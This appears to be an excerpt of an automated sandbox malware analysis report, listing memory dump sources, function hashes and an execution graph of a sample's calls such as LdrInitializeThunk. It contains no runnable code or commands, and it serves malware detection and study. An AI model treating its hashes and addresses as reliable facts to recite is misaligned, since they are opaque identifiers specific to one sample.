                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 8afc5ddc9c4adddf808119984c4c44476c87d99d20c5e0ff6de16f804868ba1a
                                                                                                            • Instruction ID: b6a18869ae6457e9956a6fccd47eaf9209838847c725c881bcb5f52e4091bd8e
                                                                                                            • Opcode Fuzzy Hash: 8afc5ddc9c4adddf808119984c4c44476c87d99d20c5e0ff6de16f804868ba1a
                                                                                                            • Instruction Fuzzy Hash: 9B31AAB4D002189FDF14CFA9D984AAEFBB4BB89310F24942AE914B7200D735A905CF98
                                                                                                            Function 001B99B0 Relevance: 1.3, APIs: 1, Instructions: 77COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 2ac0cdd8abeedca38c4da12da73b78af25751ffaf3a668c93f5830d7a3817ddb
                                                                                                            • Instruction ID: e8b9e3cd367f1b9fa5a38383b63434b7c46a4d5acc0685137f3f3bc60a1ad255
                                                                                                            • Opcode Fuzzy Hash: 2ac0cdd8abeedca38c4da12da73b78af25751ffaf3a668c93f5830d7a3817ddb
                                                                                                            • Instruction Fuzzy Hash: 2631EDB4D04258DFCB10CFA9D484AEEFBF4AB49314F24906AE815B7310C378A946CFA5
                                                                                                            Function 001B8B4C Relevance: 1.3, APIs: 1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: fde642e8f8120584c019e46fdc4ecec95470bb2721b3428de7b3df9dfd6ad8e2
                                                                                                            • Instruction ID: 9c8badaf7be4de8481f5217ca0acc97c16e52d0e994de90e5854599826336c42
                                                                                                            • Opcode Fuzzy Hash: fde642e8f8120584c019e46fdc4ecec95470bb2721b3428de7b3df9dfd6ad8e2
                                                                                                            • Instruction Fuzzy Hash: 9531CCB4D04218DFCB10CFA9D584AEEFBF4AB49314F24906AE915B7310D378A945CFA5
                                                                                                            Function 0012D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.413978447.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_12d000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d32d25903e4d978cb5fb512f29329b3589c7f25dc5ea36a6b486cc697dee699
                                                                                                            • Instruction ID: 23a2a94f2abfd84573e74ae4b38f9f1fed035b5ef2de266f21fe13856d427db2
                                                                                                            • Opcode Fuzzy Hash: 3d32d25903e4d978cb5fb512f29329b3589c7f25dc5ea36a6b486cc697dee699
                                                                                                            • Instruction Fuzzy Hash: 5521D475604340EFEB05DF14F9C4B26BBA5FB84314F34C6A9E8494B242C336D866CBA2
                                                                                                            Function 0012D01C Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.413978447.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_12d000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2f485727e814f305fa10cbe292a7bcf25802511fd9910f91fd713e480cbf92c1
                                                                                                            • Instruction ID: c1610236ef65a15566f1b828b2716a9c4d66d544556ba6ce564c83cb5c9aa319
                                                                                                            • Opcode Fuzzy Hash: 2f485727e814f305fa10cbe292a7bcf25802511fd9910f91fd713e480cbf92c1
                                                                                                            • Instruction Fuzzy Hash: A921F275604340DFEB14CF14F8C4B16BB61EB84314F34C6A9E8494B266C336D867CBA6
                                                                                                            Function 0012D006 Relevance: .1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.413978447.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_12d000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 63f467cb0f14938b08859b560e859839a7212ffe651fcd0aad6300badc8754cb
                                                                                                            • Instruction ID: ea41929cd5d2d1c91195eeb09a1b8d6431c8bba20278581f695c21ba3bfaa317
                                                                                                            • Opcode Fuzzy Hash: 63f467cb0f14938b08859b560e859839a7212ffe651fcd0aad6300badc8754cb
                                                                                                            • Instruction Fuzzy Hash: F72150755083809FDB12CF24E994715BF71EF46314F28C5DAD8498F267C33A985ACBA2
                                                                                                            Function 0012D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.413978447.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_12d000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                                                                            • Instruction ID: e63d1141d8ef92aa173e8c96c67b0efac4c362b5759649f04213f4a8e86407c9
                                                                                                            • Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                                                                            • Instruction Fuzzy Hash: E5115B75504280DFDB15CF14E5C4B15BFA1FB84314F24C6AAD8498B656C33AD85ACBA2

                                                                                                            Non-executed Functions

                                                                                                            Function 005F0A9B Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: t)5
                                                                                                            • API String ID: 0-3192668758
                                                                                                            • Opcode ID: faef37144d0e899c64575d5118d4645b0337507dfc9477cea15ca2b2c7df9836
                                                                                                            • Instruction ID: 87f8c6914736e5f4e71a0f645ecdf7c682dcf4c11d33f17354f8bfd596ba777c
                                                                                                            • Opcode Fuzzy Hash: faef37144d0e899c64575d5118d4645b0337507dfc9477cea15ca2b2c7df9836
                                                                                                            • Instruction Fuzzy Hash: 68E14A74E102598FDB14DFA8C580AAEFBB2FF89305F288169D914AB356C734AD41CF60
                                                                                                            Function 005F0F00 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \+5
                                                                                                            • API String ID: 0-3122935692
                                                                                                            • Opcode ID: 2198110b7f7d7f4c1c7c1dd23f8bb7b142cd522e8017ac1d818f8e47186ab703
                                                                                                            • Instruction ID: d695b1403fcf94714d21e642eda1cb06bc9e094499805328526c0f769f9328ae
                                                                                                            • Opcode Fuzzy Hash: 2198110b7f7d7f4c1c7c1dd23f8bb7b142cd522e8017ac1d818f8e47186ab703
                                                                                                            • Instruction Fuzzy Hash: 27E12874E10659CFDB14DFA9C580AAEFBB2BF89301F248169D914AB356DB30AD41CF60
                                                                                                            Function 005F1338 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: -5
                                                                                                            • API String ID: 0-2979332414
                                                                                                            • Opcode ID: 34fb8137eeb1613cdcff77905515596717fa2f8dcb3f53268a45937ac7d73ded
                                                                                                            • Instruction ID: 22a679df957fae0712b73fb3a35c520e447e33e8cced453340f585ec8199685a
                                                                                                            • Opcode Fuzzy Hash: 34fb8137eeb1613cdcff77905515596717fa2f8dcb3f53268a45937ac7d73ded
                                                                                                            • Instruction Fuzzy Hash: 29E11874E10659CFDB14DFA8C580AADBBB2FF89301F248169D914AB356D730AD41CFA0
                                                                                                            Function 005F1820 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9325a2cc997b46c2c30365303d227a33e486c76b176c1a4ad6ad6ee8850070c0
                                                                                                            • Instruction ID: 1cc8c2eac2a91adfbdc1f030e5bdc768a7e50d6a8a8dab2446fd2f2c3b1f68fc
                                                                                                            • Opcode Fuzzy Hash: 9325a2cc997b46c2c30365303d227a33e486c76b176c1a4ad6ad6ee8850070c0
                                                                                                            • Instruction Fuzzy Hash: 02E11874E10659CFDB14DFA9C680AADBBB2BF89301F248169D914AB356D730AD41CFA0
                                                                                                            Function 005F2420 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6d51f994ea8e9cc79669d5a7c0aeb280c3e0af35745ad326fcd1d54ef5958425
                                                                                                            • Instruction ID: 76fc88e9d2af966ed926e10cdf3fd19df0db79f21a52b314a300799bb01e03ec
                                                                                                            • Opcode Fuzzy Hash: 6d51f994ea8e9cc79669d5a7c0aeb280c3e0af35745ad326fcd1d54ef5958425
                                                                                                            • Instruction Fuzzy Hash: F9E109B4E102598FDB14DFA9C580AADFBB2FF89301F248169D914AB356DB34AD41CF60
                                                                                                            Function 001B81F0 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ef7061a8d811f193f0bff936f72ae7a1cb805903fba08e4cd67142c6d3e69e9
                                                                                                            • Instruction ID: 4ddb0bd544b70c9235f1342f3eae4ffa219b5b6681c2c264c9daf906217b4d66
                                                                                                            • Opcode Fuzzy Hash: 5ef7061a8d811f193f0bff936f72ae7a1cb805903fba08e4cd67142c6d3e69e9
                                                                                                            • Instruction Fuzzy Hash: A0E1F974E102598FDB14DF99C680AADFBF2BF89305F248169D814AB356DB30AD41CFA0
                                                                                                            Function 001B78F8 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3ccf1141fec43d9c14c1aafcb965f30acc4fd3fded7f3708abe8bee58655b1f8
                                                                                                            • Instruction ID: 03de6fc83bf9ff4dced94f8020bc4eaa3ef5dbd368c87c4b1bce3ccd3e9e15e6
                                                                                                            • Opcode Fuzzy Hash: 3ccf1141fec43d9c14c1aafcb965f30acc4fd3fded7f3708abe8bee58655b1f8
                                                                                                            • Instruction Fuzzy Hash: 00E11A74E142598FDB14DFA9C680AADFBB2FF89305F248169D814AB356D730AD41CFA0
                                                                                                            Function 001B7D30 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9461fa5c9b2d02d9f1cb64157fe68429d8954f1a7dc4465b48b2df0c6c2458cb
                                                                                                            • Instruction ID: c429d71217148f5bc25c6fcb17be0690ad20bd1a19cea9643e9f753508382eed
                                                                                                            • Opcode Fuzzy Hash: 9461fa5c9b2d02d9f1cb64157fe68429d8954f1a7dc4465b48b2df0c6c2458cb
                                                                                                            • Instruction Fuzzy Hash: ECE11B74E142598FDB14DFA9C580AADFBB2FF89305F248169D814AB356DB30AD41CFA0
                                                                                                            Function 001BA508 Relevance: .2, Instructions: 169COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f15e4dc7d05837fd5d60019825bb6ee540b20f324be839ed8b89b34448ea0b24
                                                                                                            • Instruction ID: c3860cd8727a2d47e97b0081a20ddb74cb55ae2bbe0f96dc33dd221617187381
                                                                                                            • Opcode Fuzzy Hash: f15e4dc7d05837fd5d60019825bb6ee540b20f324be839ed8b89b34448ea0b24
                                                                                                            • Instruction Fuzzy Hash: F4717274E012589FDB08DFAAC984ADEFBF2BF88300F58C165D419A7215D7349942CF51
                                                                                                            Function 005F240F Relevance: .1, Instructions: 131COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6622c1bf6ab2d5600a5cbc0587c31bc72abc24a3482895ad20788c4dee1c90dd
                                                                                                            • Instruction ID: b513678dde4f8dcce613000503bc1fbc8c66533fd951fd28510672e3564f3c73
                                                                                                            • Opcode Fuzzy Hash: 6622c1bf6ab2d5600a5cbc0587c31bc72abc24a3482895ad20788c4dee1c90dd
                                                                                                            • Instruction Fuzzy Hash: D0512BB0E002598FDB18DFA9C5905AEFBF2BF89300F24816AD518AB356D7349D41CFA0
                                                                                                            Function 001BA4F7 Relevance: .1, Instructions: 129COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a70397add657daa860ce7a25ef166f63ad102ba3023ef3aaea919d512a5734ca
                                                                                                            • Instruction ID: dd5a22e14db0d25c294fb63f7c6f5175114e82e79f839a08d4311a2a083f2407
                                                                                                            • Opcode Fuzzy Hash: a70397add657daa860ce7a25ef166f63ad102ba3023ef3aaea919d512a5734ca
                                                                                                            • Instruction Fuzzy Hash: A4518E75E006588FDB08DFAAC9946DEFBF2BF88300F18C06AD419AB315DB349946CB51
                                                                                                            Function 005F4973 Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5de48247a52b7b333e42e218f9b4a0a5a108b35a5cde6646c0ba396364a5b8c0
                                                                                                            • Instruction ID: c44250e89ac68c6f5fc74f71b6caa40315bdc610f9b6d7c96152396c561dcbe2
                                                                                                            • Opcode Fuzzy Hash: 5de48247a52b7b333e42e218f9b4a0a5a108b35a5cde6646c0ba396364a5b8c0
                                                                                                            • Instruction Fuzzy Hash: 72C04C25D8D008D7D7111D8464040FAFF7CF38B327F103951930EA2512462456599E56

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:6.1%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:65
                                                                                                            Total number of Limit Nodes:0
                                                                                                            execution_graph 31060 1d0848 31061 1d086a 31060->31061 31062 1d0c10 31061->31062 31064 1d2320 31061->31064 31067 1d5435 31064->31067 31066 1d2325 31066->31062 31077 1d8ec4 31067->31077 31069 1d5664 31095 543e68 31069->31095 31070 1d5775 31101 3a9311 31070->31101 31107 3a9320 31070->31107 31071 1d5aa8 31071->31066 31079 1d8ec7 31077->31079 31078 1d543b 31089 3f82b0 31078->31089 31079->31078 31113 1de133 31079->31113 31117 1ddd50 31079->31117 31121 1ddd41 31079->31121 31080 1d9043 KiUserExceptionDispatcher 31081 1d8fbe 31080->31081 31081->31078 31081->31080 31125 562ac9 31081->31125 31129 562ad8 31081->31129 31133 562cef 31081->31133 31137 562c73 31081->31137 31090 3f82d2 31089->31090 31091 3f83a5 31090->31091 31092 1ddd41 LdrInitializeThunk 31090->31092 31093 1ddd50 LdrInitializeThunk 31090->31093 31094 1de133 LdrInitializeThunk 31090->31094 31091->31069 31092->31091 31093->31091 31094->31091 31096 543e84 31095->31096 31097 543f2f 31096->31097 31098 1ddd41 LdrInitializeThunk 31096->31098 31099 1ddd50 LdrInitializeThunk 31096->31099 31100 1de133 LdrInitializeThunk 31096->31100 31097->31070 31098->31097 31099->31097 31100->31097 31102 3a933c 31101->31102 31103 3a93e7 31102->31103 31104 1ddd41 LdrInitializeThunk 31102->31104 31105 1ddd50 LdrInitializeThunk 31102->31105 31106 1de133 LdrInitializeThunk 31102->31106 31103->31071 31104->31103 31105->31103 31106->31103 31108 3a933c 31107->31108 31109 3a93e7 31108->31109 31110 1ddd41 LdrInitializeThunk 31108->31110 31111 1ddd50 LdrInitializeThunk 31108->31111 31112 1de133 LdrInitializeThunk 31108->31112 31109->31071 31110->31109 31111->31109 31112->31109 31114 1ddfeb LdrInitializeThunk 31113->31114 31116 1de288 31114->31116 31116->31081 31120 1ddd81 31117->31120 31118 1ddee1 31118->31081 31119 1de270 LdrInitializeThunk 31119->31118 31120->31118 31120->31119 31124 1ddd48 31121->31124 31122 1ddee1 31122->31081 31123 1de270 LdrInitializeThunk 31123->31122 31124->31122 31124->31123 31127 562ad8 31125->31127 31126 562c2a LdrInitializeThunk 31128 562c1b 31126->31128 31127->31126 31127->31128 31128->31081 31132 562aff 31129->31132 31130 562c2a LdrInitializeThunk 31131 562c1b 31130->31131 31131->31081 31132->31130 31132->31131 31134 562c1b 31133->31134 31136 562b37 31133->31136 31134->31081 31135 562c2a LdrInitializeThunk 31135->31134 31136->31134 31136->31135 31138 562b37 31137->31138 31139 562c1b 31138->31139 31140 562c2a LdrInitializeThunk 31138->31140 31139->31081 31140->31139

                                                                                                            Executed Functions

                                                                                                            Function 001D9A4C Relevance: 4.3, Strings: 1, Instructions: 3073COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.907954251.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_1d0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: N
                                                                                                            • API String ID: 0-1130791706
                                                                                                            • Opcode ID: e182751bfbace83815465edeb51c37a8bd75c2caae4a78dea723d53be6ee2753
                                                                                                            • Instruction ID: 081ef60328218c55b8bdb67242476faa71521b96113cc7bc700814df8ebbe8fb
                                                                                                            • Opcode Fuzzy Hash: e182751bfbace83815465edeb51c37a8bd75c2caae4a78dea723d53be6ee2753
                                                                                                            • Instruction Fuzzy Hash: EB73C231D1075A8EDB11EF68C884A9DF7B1FF99300F51869AE44977221EB70AAD4CF81
                                                                                                            Function 001DDD50 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 954 1ddd50-1ddd7f 955 1ddd86-1dde1c 954->955 956 1ddd81 954->956 958 1ddebb-1ddec1 955->958 956->955 959 1ddec7-1ddedf 958->959 960 1dde21-1dde34 958->960 961 1ddee1-1ddeee 959->961 962 1ddef3-1ddf06 959->962 963 1dde3b-1dde45 960->963 964 1dde36 960->964 965 1de288-1de384 961->965 966 1ddf0d-1ddf29 962->966 967 1ddf08 962->967 968 1dde4c-1dde8c 963->968 964->963 972 1de38c-1de396 965->972 973 1de386-1de38b 965->973 969 1ddf2b 966->969 970 1ddf30-1ddf54 966->970 967->966 980 1dde9f-1ddeb1 968->980 981 1dde8e-1dde9c 968->981 969->970 976 1ddf5b-1ddf8d 970->976 977 1ddf56 970->977 973->972 986 1ddf8f 976->986 987 1ddf94-1ddfd6 976->987 977->976 983 1ddeb8 980->983 984 1ddeb3 980->984 981->959 983->958 984->983 986->987 989 1ddfdd-1ddfe6 987->989 990 1ddfd8 987->990 991 1de20d-1de213 989->991 990->989 992 1de219-1de22c 991->992 993 1ddfeb-1de010 991->993 994 1de22e 992->994 995 1de233-1de24e 992->995 996 1de017-1de04d 993->996 997 1de012 993->997 994->995 998 1de255-1de269 995->998 999 1de250 995->999 1005 1de04f 996->1005 1006 1de054-1de086 996->1006 997->996 1003 1de26b 998->1003 1004 1de270-1de286 LdrInitializeThunk 998->1004 999->998 1003->1004 1004->965 1005->1006 1008 1de088-1de0ad 1006->1008 1009 1de0ea-1de0fd 1006->1009 1010 1de0af 1008->1010 1011 1de0b4-1de0e2 1008->1011 1012 1de0ff 1009->1012 1013 1de104-1de129 1009->1013 1010->1011 1011->1009 1012->1013 1016 1de138-1de170 1013->1016 1017 1de12b-1de12c 1013->1017 1018 1de177-1de1d8 1016->1018 1019 1de172 1016->1019 1017->992 1024 1de1df-1de203 1018->1024 1025 1de1da 1018->1025 1019->1018 1028 1de20a 1024->1028 1029 1de205 1024->1029 1025->1024 1028->991 1029->1028
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.907954251.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_1d0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 063a4d8f8591f683e2ce90d74973f9ad9b18ccb7000462551f71944622e8d32b
                                                                                                            • Instruction ID: 5cb8694e3f132ae1b6e034dfefd0976710faa94e89e23ae2b8786ed2d06c76f7
                                                                                                            • Opcode Fuzzy Hash: 063a4d8f8591f683e2ce90d74973f9ad9b18ccb7000462551f71944622e8d32b
                                                                                                            • Instruction Fuzzy Hash: DEF10874E01228CFDB14DFA9C884B9DFBB2BF88305F5485AAD408AB355DB30A985CF50
                                                                                                            Function 001D8EC4 Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1166 1d8ec4-1d8ec5 1167 1d8ef8-1d8f88 1166->1167 1168 1d8ec7-1d8ef0 1166->1168 1174 1d8f8e-1d8f9e 1167->1174 1175 1d92da-1d930c 1167->1175 1169 1d8ef7 1168->1169 1170 1d8ef2 1168->1170 1169->1167 1170->1169 1227 1d8fa1 call 1d9330 1174->1227 1228 1d8fa1 call 1d95b0 1174->1228 1229 1d8fa1 call 1d9672 1174->1229 1178 1d8fa7-1d8fb6 1230 1d8fb8 call 1ddd41 1178->1230 1231 1d8fb8 call 1ddd50 1178->1231 1232 1d8fb8 call 1de133 1178->1232 1179 1d8fbe-1d8fda 1181 1d8fdc 1179->1181 1182 1d8fe1-1d8fea 1179->1182 1181->1182 1183 1d92cd-1d92d3 1182->1183 1184 1d8fef-1d8ffb 1183->1184 1185 1d92d9 1183->1185 1223 1d8ffd call 562c73 1184->1223 1224 1d8ffd call 562cef 1184->1224 1225 1d8ffd call 562ad8 1184->1225 1226 1d8ffd call 562ac9 1184->1226 1185->1175 1186 1d9003-1d9069 KiUserExceptionDispatcher 1189 1d906f-1d90dd call 1d3858 1186->1189 1190 1d9125-1d9180 1186->1190 1200 1d90df-1d911f 1189->1200 1201 1d9120-1d9123 1189->1201 1202 1d9181-1d91cf 1190->1202 1200->1201 1201->1202 1207 1d92b8-1d92c3 1202->1207 1208 1d91d5-1d92b7 1202->1208 1209 1d92ca 1207->1209 1210 1d92c5 1207->1210 1208->1207 1209->1183 1210->1209 1223->1186 1224->1186 1225->1186 1226->1186 1227->1178 1228->1178 1229->1178 1230->1179 1231->1179 1232->1179
                                                                                                            APIs
                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 001D9055
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.907954251.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_1d0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 6842923-0
                                                                                                            • Opcode ID: d2881b620b88c2c094af559779ca694830287344c92c590f36ccc44f54fc6c8a
                                                                                                            • Instruction ID: 368487c7eabf4f860d23c39a3c15ec3bcfb8ac17b942aa232ca0787c3f872320
                                                                                                            • Opcode Fuzzy Hash: d2881b620b88c2c094af559779ca694830287344c92c590f36ccc44f54fc6c8a
                                                                                                            • Instruction Fuzzy Hash: 1FD1A274E00218CFDB14DFA5D994B9DBBB2BF89304F1084AAD809AB395DB356E85CF50
                                                                                                            Function 00650040 Relevance: .7, Instructions: 745COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
